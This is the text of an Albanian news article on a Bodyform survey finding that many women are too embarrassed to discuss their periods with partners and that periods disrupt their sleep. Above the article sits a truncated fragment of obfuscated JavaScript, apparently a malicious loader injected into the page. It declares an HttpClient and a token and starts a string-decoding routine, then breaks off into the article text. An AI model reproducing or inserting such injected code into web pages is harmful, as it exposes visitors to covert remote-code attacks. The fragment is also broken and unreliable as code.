;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Pse disa gra kanë shumë turp të flasin për periodat me partnerin e tyre?

By

Një studim ka zbuluar se miliona gra nuk flasin kurrë për periodat e tyre me partnerin.

Një sondazh me 1 mijë e 500 gra zbuloi 35 përqind e grave ndihen shumë të turpëruara për të lënë partnerin të dijë për shqetësimet e tyre për periodat.

33 prej tyre kanë biseduar me partnerët, 22 përqind kanë fshehur dhe larë çarçafë të njollosur pa e ditur partneri i tyre, pasi ndihen të turpëruara për çdo rrjedhje, shkruan The Sun, transmeton Klankosova.tv.

Ndërsa, pjesa tjetër kanë fjetur edhe në divan, pra larg partnerit gjatë kohës kur kanë qenë me cikël.

Bodyform, i cili autorizoi kërkimin së bashku me fushatën e tij Periodsomnia, u shpreh se gratë nuk duhet të ndihen të turpëruara për shkak të periodave të tyre.

“Rezultatet tregojnë se kaq shumë gra fshehin çarçafë me njolla dhe sipas tyre kjo mund të jetë e turpshme. Por, nuk duhet të jetë kështu, është mënyra se si na kanë mësuar, por kjo është thjeshtë një gjë e natyrshme që trupi juaj e bën dhe është në rregull”, u shpreh ai.

Sondazhi zbuloi gjithashtu se 29 për qind e të anketuarve kanë një cilësi më të keqe të gjumit se zakonisht gjatë periodave të tyre, për shkak të ngërçeve të stomakut, fryrjes dhe shqetësimeve për rrjedhjet, duke humbur mesatarisht pesë orë gjumë në natë.

Artikuj të ngjashëm